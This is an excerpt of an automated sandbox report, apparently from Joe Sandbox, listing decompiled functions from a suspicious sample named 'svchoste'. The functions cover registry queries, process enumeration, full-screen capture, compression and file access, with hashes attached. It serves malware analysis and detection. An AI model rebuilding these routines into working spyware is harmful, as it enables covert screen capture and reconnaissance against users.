				signed int _t10;
				long _t13;
				intOrPtr _t20;
				char* _t21;
				char* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t10 =  *0xba01f4; // 0xac8b3e58
				_v16 = _t10 ^ _t29;
				_v12 = 0xff;
				_t21 =  *0xba2594; // 0x2d07050
				_t13 = RegOpenKeyExA(0x80000002, _t21, 0, 0x20119,  &_v8); // executed
				if(_t13 == 0) {
					_t24 =  *0xba2224; // 0x2d06bc8
					_t25 = _v8;
					RegQueryValueExA(_v8, _t24, 0, 0,  &_v284,  &_v12); // executed
				}
				RegCloseKey(_v8);
				return E00B74354( &_v284, _t20, _v16 ^ _t29, _t25, _t27, _t28);
			}

0x00b8b0e9
0x00b8b0f0
0x00b8b0f3
0x00b8b105
0x00b8b111
0x00b8b119
0x00b8b12a
0x00b8b131
0x00b8b135
0x00b8b135
0x00b8b13f
0x00b8b158

APIs

RegOpenKeyExA.KERNEL32(80000002,02D07050,00000000,00020119,?), ref: 00B8B111
RegQueryValueExA.KERNEL32(?,02D06BC8,00000000,00000000,?,000000FF), ref: 00B8B135
RegCloseKey.ADVAPI32(?), ref: 00B8B13F

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 404d3e7cccc45dc6bb3078ac9510e683da42b4e45e3ca55f806b098aa89034cd
Instruction ID: 6a32c70e8923981bc096eb0ec4ae0793e8714be1eb779b0ec691cdbfa5d35b69
Opcode Fuzzy Hash: 404d3e7cccc45dc6bb3078ac9510e683da42b4e45e3ca55f806b098aa89034cd
Instruction Fuzzy Hash: B2011275A4020DAFDB04DBA4DC57FEEB7B8EB49700F504099B605A7191EB746A44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B260, Relevance: 4.5, APIs: 3, Instructions: 38
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B8B260() {
				void* _v8;
				int _v12;
				signed int _v16;
				char _v284;
				signed int _t10;
				long _t13;
				intOrPtr _t20;
				char* _t21;
				char* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t10 =  *0xba01f4; // 0xac8b3e58
				_v16 = _t10 ^ _t29;
				_v12 = 0xff;
				_t21 =  *0xba23d8; // 0x2d07018
				_t13 = RegOpenKeyExA(0x80000002, _t21, 0, 0x20119,  &_v8); // executed
				if(_t13 == 0) {
					_t24 =  *0xba2480; // 0x2d06c28
					_t25 = _v8;
					RegQueryValueExA(_v8, _t24, 0, 0,  &_v284,  &_v12); // executed
				}
				RegCloseKey(_v8);
				return E00B74354( &_v284, _t20, _v16 ^ _t29, _t25, _t27, _t28);
			}

0x00b8b269
0x00b8b270
0x00b8b273
0x00b8b285
0x00b8b291
0x00b8b299
0x00b8b2aa
0x00b8b2b1
0x00b8b2b5
0x00b8b2b5
0x00b8b2bf
0x00b8b2d8

APIs

RegOpenKeyExA.KERNEL32(80000002,02D07018,00000000,00020119,?), ref: 00B8B291
RegQueryValueExA.KERNEL32(?,02D06C28,00000000,00000000,?,000000FF), ref: 00B8B2B5
RegCloseKey.ADVAPI32(?), ref: 00B8B2BF

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: fb76e05e301d8a8a7555391eebeaf62784262315dfe94b030bff83b0bb2453bb
Instruction ID: 13226f9961575259658b63a856e20626bae4d2c388e2bd1606c93a8d67b93379
Opcode Fuzzy Hash: fb76e05e301d8a8a7555391eebeaf62784262315dfe94b030bff83b0bb2453bb
Instruction Fuzzy Hash: 3C011D75A4020DAFDB04DFA4DC46FEEB7B8EB49700F508099B605A7290DF746A458B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B460, Relevance: 4.5, APIs: 3, Instructions: 38
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B8B460() {
				void* _v8;
				int _v12;
				signed int _v16;
				char _v284;
				signed int _t10;
				long _t13;
				intOrPtr _t20;
				char* _t21;
				char* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t10 =  *0xba01f4; // 0xac8b3e58
				_v16 = _t10 ^ _t29;
				_v12 = 0xff;
				_t21 =  *0xba21e0; // 0x2d06fd8
				_t13 = RegOpenKeyExA(0x80000002, _t21, 0, 0x20119,  &_v8); // executed
				if(_t13 == 0) {
					_t24 =  *0xba2574; // 0x2d05f40
					_t25 = _v8;
					RegQueryValueExA(_v8, _t24, 0, 0,  &_v284,  &_v12); // executed
				}
				RegCloseKey(_v8);
				return E00B74354( &_v284, _t20, _v16 ^ _t29, _t25, _t27, _t28);
			}

0x00b8b469
0x00b8b470
0x00b8b473
0x00b8b485
0x00b8b491
0x00b8b499
0x00b8b4aa
0x00b8b4b1
0x00b8b4b5
0x00b8b4b5
0x00b8b4bf
0x00b8b4d8

APIs

RegOpenKeyExA.KERNEL32(80000002,02D06FD8,00000000,00020119,?), ref: 00B8B491
RegQueryValueExA.KERNEL32(?,02D05F40,00000000,00000000,?,000000FF), ref: 00B8B4B5
RegCloseKey.ADVAPI32(?), ref: 00B8B4BF

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 2a1b3f01973593966b07e9143acf1d11951696a832311c1a8492c511e341570c
Instruction ID: 6288af07c08a8b64d34cb2d587f030895dc638e35bd664a376d2227a68517b03
Opcode Fuzzy Hash: 2a1b3f01973593966b07e9143acf1d11951696a832311c1a8492c511e341570c
Instruction Fuzzy Hash: 1F011D75A4020CAFDB04DBA4DC47FEEB7B8EB49700F508199F605A7291DB746A448B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A600, Relevance: 4.5, APIs: 3, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00B8A600(long _a4) {
				void* _v8;
				signed int _v12;
				char _v276;
				signed int _t10;
				intOrPtr _t19;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t10 =  *0xba01f4; // 0xac8b3e58
				_v12 = _t10 ^ _t26;
				_v8 = OpenProcess(0x410, 0, _a4);
				if(_v8 != 0) {
					_t23 = _v8;
					 *0xba27f0(_v8, 0,  &_v276, 0x104); // executed
					CloseHandle(_v8);
				}
				return E00B74354( &_v276, _t19, _v12 ^ _t26, _t23, _t24, _t25);
			}

0x00b8a609
0x00b8a610
0x00b8a624
0x00b8a62b
0x00b8a63b
0x00b8a63f
0x00b8a649
0x00b8a649
0x00b8a662

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00B8A61E
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00B8A63F
CloseHandle.KERNEL32(00000000), ref: 00B8A649

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: a40753abfd30dc4559a67f148632e65698df941054723840af0d17fb26414142
Instruction ID: ab45e431147fbf98d414f0358a090a7550ff1fd7e604a4cd71e0465a60e2a3b4
Opcode Fuzzy Hash: a40753abfd30dc4559a67f148632e65698df941054723840af0d17fb26414142
Instruction Fuzzy Hash: CEF03674A4020CEFDB04DFA4DD47BED77B4EB08700F104495F61997290DAB06E84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B85750, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B85750(signed int _a4, signed int _a8, signed short* _a12) {
				signed int _v8;
				signed char _v9;
				signed int _t97;
				signed int _t99;

				if(_a8 < 1 || _a8 > 8) {
					_v9 = 0;
				} else {
					_v9 = 1;
				}
				E00B847B0(_a4, _v9 & 0x000000ff, "bad pack level");
				 *((intOrPtr*)(_a4 + 0x6af78)) = 0;
				if( *((intOrPtr*)(_a4 + 0x6af70)) == 0) {
					 *((intOrPtr*)(_a4 + 0x6af78)) = 1;
					 *((intOrPtr*)(_a4 + 0x6af70)) = 0x10000;
				}
				 *((intOrPtr*)(_a4 + 0x6af6c)) = 0;
				E00B791C0(_a4 + 0x4af70, 0, 0x1fffc);
				 *(_a4 + 0x6af98) =  *(0xb993b2 + _a8 * 8) & 0x0000ffff;
				 *(_a4 + 0x6af9c) =  *(0xb993b0 + _a8 * 8) & 0x0000ffff;
				 *(_a4 + 0x6afa0) =  *(0xb993b4 + _a8 * 8) & 0x0000ffff;
				 *(_a4 + 0x6af94) =  *(0xb993b6 + _a8 * 8) & 0x0000ffff;
				if(_a8 > 2) {
					if(_a8 >= 8) {
						 *_a12 =  *_a12 & 0x0000ffff | 0x00000002;
					}
				} else {
					 *_a12 =  *_a12 & 0x0000ffff | 0x00000004;
				}
				 *((intOrPtr*)(_a4 + 0x6af84)) = 0;
				 *((intOrPtr*)(_a4 + 0x6af74)) = 0;
				_v8 = 0x8000;
				_v8 = _v8 << 1;
				_t97 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc))))(_a4, _a4 + 0x1af70, _v8); // executed
				 *((intOrPtr*)(_a4 + 0x6af90)) = _t97;
				if( *((intOrPtr*)(_a4 + 0x6af90)) == 0) {
					L12:
					 *((intOrPtr*)(_a4 + 0x6af8c)) = 1;
					 *((intOrPtr*)(_a4 + 0x6af90)) = 0;
					return _t97;
				}
				_t97 = _a4;
				if( *((intOrPtr*)(_t97 + 0x6af90)) == 0xffffffff) {
					goto L12;
				}
				 *((intOrPtr*)(_a4 + 0x6af8c)) = 0;
				if( *((intOrPtr*)(_a4 + 0x6af90)) < 0x106) {
					E00B85190(_a4); // executed
				}
				_t99 = _a4;
				 *((intOrPtr*)(_t99 + 0x6af7c)) = 0;
				_v8 = 0;
				while(_v8 < 2) {
					_t99 = ( *(_a4 + 0x6af7c) << 0x00000005 ^  *(_a4 + _v8 + 0x1af70) & 0x000000ff) & 0x00007fff;
					 *(_a4 + 0x6af7c) = _t99;
					_v8 = _v8 + 1;
				}
				return _t99;
			}

0x00b8575a
0x00b85768
0x00b85762
0x00b85762
0x00b85762
0x00b8577a
0x00b85785
0x00b85799
0x00b8579e
0x00b857ab
0x00b857ab
0x00b857b8
0x00b857d3
0x00b857e9
0x00b857fd
0x00b85811
0x00b85825
0x00b8582f
0x00b85846
0x00b85854
0x00b85854
0x00b85831
0x00b8583d
0x00b8583d
0x00b8585a
0x00b85867
0x00b85871
0x00b8587d
0x00b85897
0x00b8589f
0x00b858af
0x00b858bd
0x00b858c0
0x00b858cd
0x00000000
0x00b858cd
0x00b858b1
0x00b858bb
0x00000000
0x00000000
0x00b858dc
0x00b858f3
0x00b858f9
0x00b858fe
0x00b85901
0x00b85904
0x00b8590e
0x00b85920
0x00b85941
0x00b85949
0x00b8591d
0x00b8591d
0x00b85954

APIs

_memset.LIBCMT ref: 00B857D3

Strings

bad pack level, xrefs: 00B8576C

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _memset
String ID: bad pack level
API String ID: 2102423945-4081416248
Opcode ID: f5fc3298574acd3085c5da9688c19b04aecf0508f1eb2c55b807fbc555255b1a
Instruction ID: 04911ec97458827fe260b5cce41d61c89d88940a78a4f7830005ddd516dd9777
Opcode Fuzzy Hash: f5fc3298574acd3085c5da9688c19b04aecf0508f1eb2c55b807fbc555255b1a
Instruction Fuzzy Hash: F85124B4600208EBDB14DF54C444BA97BB2FB45358F1482B9E8495F391D376EA96CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00B86EC0, Relevance: 3.1, APIs: 2, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B86EC0(void* __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t39;
				intOrPtr _t49;
				intOrPtr _t50;

				_v16 = __ecx;
				 *(_v16 + 0x7c) = 0;
				 *(_v16 + 0x84) = 0;
				 *((char*)(_v16 + 0x80)) = 0;
				 *(_v16 + 0x78) = 0;
				 *(_v16 + 0x70) = 0;
				 *(_v16 + 0x90) = 0;
				 *(_v16 + 0x74) = 0;
				if(_a4 != 0) {
					_t31 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
					_v12 = _t31;
					if(_v12 != 0xffffffff) {
						_t32 = E00B86D00(_t39, _v16, _t49, _t50, _v12, 0); // executed
						_v8 = _t32;
						if(_v8 == 0) {
							 *((char*)(_v16 + 0x80)) = 1;
							return 0;
						}
						CloseHandle(_v12);
						return _v8;
					}
					return 0x200;
				}
				return 0x10000;
			}

0x00b86ec6
0x00b86ecc
0x00b86ed6
0x00b86ee3
0x00b86eed
0x00b86ef7
0x00b86f01
0x00b86f0e
0x00b86f19
0x00b86f35
0x00b86f3b
0x00b86f42
0x00b86f54
0x00b86f59
0x00b86f60
0x00b86f74
0x00000000
0x00b86f7b
0x00b86f66
0x00000000
0x00b86f6c
0x00000000
0x00b86f44
0x00000000

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B86F35

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f7974f5ba2a46d2934367fefea765de753fcb36512ad6607879ee196e8f7b351
Instruction ID: 5bd861326974e3b7654d4841967d3524f131f713aa94d4b40da710445874092f
Opcode Fuzzy Hash: f7974f5ba2a46d2934367fefea765de753fcb36512ad6607879ee196e8f7b351
Instruction Fuzzy Hash: 6A21CC74E04208EFDB14DFA4D499B9DBBB0FB44304F2082E9E9256B3E1CB75AA45DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A940, Relevance: 3.0, APIs: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00B8A940(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HDC__* _v8;
				void* _v12;
				void* _t26;
				void* _t36;

				_v8 =  *0xba27fc(0);
				_v12 =  *0xba279c( *0xba28ec(0, _a12, _a16));
				SelectObject(_v8, _v12);
				 *0xba277c(_v8, 0, 0, _a12, _a16,  *0xba28ec(0, _a4, _a8, 0xcc0020));
				E00B8A7E0(_t26, _t36, _v12, 0x46); // executed
				return DeleteObject(_v12);
			}

0x00b8a94e
0x00b8a968
0x00b8a973
0x00b8a99f
0x00b8a9ab
0x00b8a9c0

APIs

SelectObject.GDI32(?,?), ref: 00B8A973
DeleteObject.GDI32(?), ref: 00B8A9B7

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Object$DeleteSelect
String ID:
API String ID: 618127014-0
Opcode ID: 1ef0a3753299c7c55e0c783bc4e90aeb4c8e112d5e12882b12bd4c16d375829e
Instruction ID: 8db3a22d062912938dfaf2ec3c84d6faa10775e0fbaf278281504422b4b71f02
Opcode Fuzzy Hash: 1ef0a3753299c7c55e0c783bc4e90aeb4c8e112d5e12882b12bd4c16d375829e
Instruction Fuzzy Hash: 9601ADB6A40208BFDB44DFE8DD4AF9E77B8EB4D701F104148FA0997290DA75AE109B61

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A9D0, Relevance: 3.0, APIs: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00B8A9D0() {
				char _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				int _v40;

				E00B73FD0( &_v36, 0, 0, 0);
				_v36 = 1;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				 *0xba28b0( &_v8,  &_v36, 0); // executed
				_v40 = 0;
				_v20 = 0;
				_v16 = GetSystemMetrics(0);
				_v12 = GetSystemMetrics(1);
				E00B8A940(_v40, _v20, _v16 - _v40, _v12 - _v20); // executed
				return  *0xba2890(_v8);
			}

0x00b8a9df
0x00b8a9e4
0x00b8a9eb
0x00b8a9f2
0x00b8a9f9
0x00b8aa0a
0x00b8aa10
0x00b8aa17
0x00b8aa26
0x00b8aa31
0x00b8aa4a
0x00b8aa5f

APIs

GetSystemMetrics.USER32(00000000), ref: 00B8AA20
GetSystemMetrics.USER32(00000001), ref: 00B8AA2B

Part of subcall function 00B8A940: SelectObject.GDI32(?,?), ref: 00B8A973
Part of subcall function 00B8A940: DeleteObject.GDI32(?), ref: 00B8A9B7

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: MetricsObjectSystem$DeleteSelect
String ID:
API String ID: 1807276707-0
Opcode ID: d1c997db43be97e8d096deddbdb13eee086213eae0b89fe5febf0a9c5db1b086
Instruction ID: 51824c70e7f6842170968683dc1a21800c1bee6a921e0dc50782bb82eacc032c
Opcode Fuzzy Hash: d1c997db43be97e8d096deddbdb13eee086213eae0b89fe5febf0a9c5db1b086
Instruction Fuzzy Hash: FE119C75D00209AFDB00DFD4DD4ABEEBBB8BF08704F104149E515B7291DB796A048BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B75EA3, Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00B75EA3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t20;
				signed int _t22;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;

				_push(0xc);
				_push(0xb9dd10);
				E00B78C20(__ebx, __edi, __esi);
				 *(_t33 - 0x1c) =  *(_t33 - 0x1c) | 0xffffffff;
				_t32 =  *((intOrPtr*)(_t33 + 8));
				_t35 = _t32;
				_t36 = _t35 != 0;
				if(_t35 != 0) {
					__eflags =  *(_t32 + 0xc) & 0x00000040;
					if(( *(_t32 + 0xc) & 0x00000040) == 0) {
						E00B799B9(_t32);
						 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
						_t20 = E00B75E36(__ebx, __edx, _t32); // executed
						 *(_t33 - 0x1c) = _t20;
						 *(_t33 - 4) = 0xfffffffe;
						E00B75F0F(_t32);
					} else {
						_t9 = _t32 + 0xc;
						 *_t9 =  *(_t32 + 0xc) & 0x00000000;
						__eflags =  *_t9;
					}
					_t22 =  *(_t33 - 0x1c);
				} else {
					 *((intOrPtr*)(E00B75A49(_t36))) = 0x16;
					_t22 = E00B77461() | 0xffffffff;
				}
				return E00B78C65(_t22);
			}

0x00b75ea3
0x00b75ea5
0x00b75eaa
0x00b75eaf
0x00b75eb5
0x00b75eb8
0x00b75ebd
0x00b75ebf
0x00b75ed6
0x00b75eda
0x00b75eea
0x00b75ef0
0x00b75ef5
0x00b75efb
0x00b75efe
0x00b75f05
0x00b75edc
0x00b75edc
0x00b75edc
0x00b75edc
0x00b75edc
0x00b75ee0
0x00b75ec1
0x00b75ec6
0x00b75ed1
0x00b75ed1
0x00b75ee8

APIs

Part of subcall function 00B75A49: __getptd_noexit.LIBCMT ref: 00B75A49

__lock_file.LIBCMT ref: 00B75EEA

Part of subcall function 00B799B9: __lock.LIBCMT ref: 00B799DE

__fclose_nolock.LIBCMT ref: 00B75EF5

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: d11c39b27cc62a41ab3d35970db2f4b06feb7355960b8daa2bf87ecedb28b3f5
Instruction ID: 74064049c400c238f6ac11949e2c0b08f07a206608aec682f55ed6ab0d944a1f
Opcode Fuzzy Hash: d11c39b27cc62a41ab3d35970db2f4b06feb7355960b8daa2bf87ecedb28b3f5
Instruction Fuzzy Hash: 6CF09030811B05DEEB30ABB9984676E7AE0AF00334F20C6D8E43DAA1D1CBBC5A419A55

Uniqueness

Uniqueness Score: -1.00%

Function 00B71C70, Relevance: 3.0, APIs: 2, Instructions: 28
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E00B71C70(intOrPtr _a4) {
				intOrPtr _v8;
				char _v20;
				intOrPtr _t15;
				void* _t18;
				void* _t19;

				_v8 = 0;
				if(_a4 > 0) {
					__eflags = _a4 - 0xffffffff;
					if(__eflags > 0) {
						L4:
						E00B71000( &_v20, 0);
						E00B77185( &_v20, 0xb9e190);
					} else {
						_push(_a4); // executed
						_t15 = E00B74E60(_t18, _t19, __eflags); // executed
						_v8 = _t15;
						__eflags = _v8;
						if(_v8 == 0) {
							goto L4;
						}
					}
				} else {
					_a4 = 0;
				}
				return _v8;
			}

0x00b71c76
0x00b71c81
0x00b71c8c
0x00b71c90
0x00b71ca7
0x00b71cac
0x00b71cba
0x00b71c92
0x00b71c95
0x00b71c96
0x00b71c9e
0x00b71ca1
0x00b71ca5
0x00000000
0x00000000
0x00b71ca5
0x00b71c83
0x00b71c83
0x00b71c83
0x00b71cc5

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 00B71CAC
__CxxThrowException@8.LIBCMT ref: 00B71CBA

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Exception@8Throwstd::bad_exception::bad_exception
String ID:
API String ID: 953301-0
Opcode ID: 2568a20780461e39d47247f7444265c8526bf575d3a88fefcc6428678319a098
Instruction ID: 5b943293280d2f6bc7b807e836532204497fb6ec39b2c2fb5c703acbc8dab902
Opcode Fuzzy Hash: 2568a20780461e39d47247f7444265c8526bf575d3a88fefcc6428678319a098
Instruction Fuzzy Hash: 7DF05E70840208EADF20EFB8C84579D77F8EB00355F10CAD8E8296B281DB709A84C791

Uniqueness

Uniqueness Score: -1.00%

Function 00B7DDC3, Relevance: 3.0, APIs: 2, Instructions: 18
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00B7DDC3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t3;
				void* _t9;
				void* _t13;
				intOrPtr _t15;
				intOrPtr _t16;

				_push(8);
				_push(0xb9dfa8);
				_t3 = E00B78C20(__ebx, __edi, __esi);
				_t15 =  *0xba1cdc; // 0x1
				if(_t15 == 0) {
					E00B7B23F(6);
					 *((intOrPtr*)(_t13 - 4)) = 0;
					_t16 =  *0xba1cdc; // 0x1
					if(_t16 == 0) {
						E00B7D6E2(__ebx, _t9, __edi, 0, _t16); // executed
						 *0xba1cdc =  *0xba1cdc + 1;
					}
					 *((intOrPtr*)(_t13 - 4)) = 0xfffffffe;
					_t3 = E00B7DE09();
				}
				return E00B78C65(_t3);
			}

0x00b7ddc3
0x00b7ddc5
0x00b7ddca
0x00b7ddd1
0x00b7ddd7
0x00b7dddb
0x00b7dde1
0x00b7dde4
0x00b7ddea
0x00b7ddec
0x00b7ddf1
0x00b7ddf1
0x00b7ddf7
0x00b7ddfe
0x00b7ddfe
0x00b7de08

APIs

__lock.LIBCMT ref: 00B7DDDB

Part of subcall function 00B7B23F: __mtinitlocknum.LIBCMT ref: 00B7B255
Part of subcall function 00B7B23F: __amsg_exit.LIBCMT ref: 00B7B261
Part of subcall function 00B7B23F: EnterCriticalSection.KERNEL32(00000000,00000000,?,00B78368,0000000D), ref: 00B7B269

__tzset_nolock.LIBCMT ref: 00B7DDEC

Part of subcall function 00B7D6E2: __lock.LIBCMT ref: 00B7D704
Part of subcall function 00B7D6E2: ____lc_codepage_func.LIBCMT ref: 00B7D74B
Part of subcall function 00B7D6E2: __getenv_helper_nolock.LIBCMT ref: 00B7D76D
Part of subcall function 00B7D6E2: _free.LIBCMT ref: 00B7D7A4
Part of subcall function 00B7D6E2: _strlen.LIBCMT ref: 00B7D7AB
Part of subcall function 00B7D6E2: __malloc_crt.LIBCMT ref: 00B7D7B2
Part of subcall function 00B7D6E2: _strlen.LIBCMT ref: 00B7D7C8
Part of subcall function 00B7D6E2: _strcpy_s.LIBCMT ref: 00B7D7D6
Part of subcall function 00B7D6E2: __invoke_watson.LIBCMT ref: 00B7D7EB
Part of subcall function 00B7D6E2: _free.LIBCMT ref: 00B7D7FA

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: abe5d5041c79abf16d454cf6a53527994666fc260ec6855c5aaa98695cec9ff6
Instruction ID: 6003bf6ac259d727b30e9692db56e438a64590aa6949b3ac680df9ac44308668
